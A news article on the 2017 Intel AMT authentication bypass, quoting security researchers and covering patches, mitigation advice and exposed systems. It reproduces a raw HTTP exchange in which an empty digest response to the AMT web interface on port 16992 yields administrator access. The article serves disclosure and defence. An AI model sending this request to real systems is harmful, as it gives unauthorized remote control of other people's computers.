A remote hijacking flaw that lurked in Intel chips for seven years was more severe than many people imagined, because it allowed hackers to remotely gain administrative control over huge fleets of computers without entering a password. This is according to technical analyses published Friday.

As Ars reported Monday , the authentication bypass vulnerability resides in a feature known as Active Management Technology. AMT, as it's usually called, allows system administrators to perform a variety of powerful tasks over a remote connection. Among the capabilities: changing the code that boots up computers, accessing the computer's mouse, keyboard, and monitor, loading and executing programs, and remotely powering on computers that are turned off. In short, AMT makes it possible to log into a computer and exercise the same control enjoyed by administrators with physical access.

AMT, which is available with many vPro processors, was set up to require a password before it could be remotely accessed over a Web browser interface. But, remarkably, that authentication mechanism can be bypassed by entering no text at all. According to a blog post published Friday by Tenable Network Security, the cryptographic hash that the interface's digest access authentication requires to verify someone is authorized to log in can be anything at all, including no string at all.

"Authentication still worked" even when the wrong hash was entered, Tenable Director of Reverse Engineering Carlos Perez wrote. "We had discovered a complete bypass of the authentication scheme."

A separate technical analysis from Embedi, the security firm Intel credited with first disclosing the vulnerability, arrived at the same conclusion. It stated:

With a little help of the local proxy at `127.0.0.1:16992`, which is

meant to replace the response with an empty string, we're able to manage the AMT via the regular Web browser as if we've known the *admin* password: ``` GET /index.htm HTTP/1.1

Host: 127.0.0.1:16992

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive HTTP/1.1 401 Unauthorized

WWW-Authenticate: Digest

realm="Digest:048A0000000000000000000000000000",

nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n",stale="false",qop="auth"

Content-Type: text/html

Server: AMT

Content-Length: 678

Connection: close GET /index.htm HTTP/1.1

Host: 127.0.0.1:16992

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101

Firefox/45.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Authorization: Digest username="admin",

realm="Digest:048A0000000000000000000000000000",

nonce="qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n", uri="/index.htm", response="",

qop=auth, nc=00000001, cnonce="60513ab58858482c" HTTP/1.1 200 OK

Date: Thu, 4 May 2017 16:09:17 GMT

Server: AMT

Content-Type: text/html

Transfer-Encoding: chunked

Cache-Control: no cache

Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6

Embedi e-mailed the analysis to reporters, but didn't publish it online.

Making matters worse, unauthorized accesses typically aren't logged by the PC because AMT has direct access to the computer's network hardware. When AMT is enabled, all network packets are redirected to the Intel Management Engine and from there to the AMT. The packets bypass the OS completely. The vulnerable management features were made available in some but not all Intel chipsets starting in 2010, Embedi has said.

In a blog post published Friday, Intel officials said they expect PC makers to release a patch next week. The releases will update Intel firmware, meaning patching will require that each vulnerable chip set is reflashed. In the meantime, Intel is urging customers to download and run this discovery tool to diagnose potentially vulnerable computers. Systems that test positive should be temporarily secured using this mitigation guide until a patch is supplied. Computer makers Fujitsu, HP, and Lenovo, have also issued advisories for specific models they sell.

[Update, 5:40pm EDT] A query of the Shodan security search engine found over 8,500 systems with the AMT interface exposed to the Internet, with over 2,000 in the United States alone:

Many others may be accessible via organizational networks.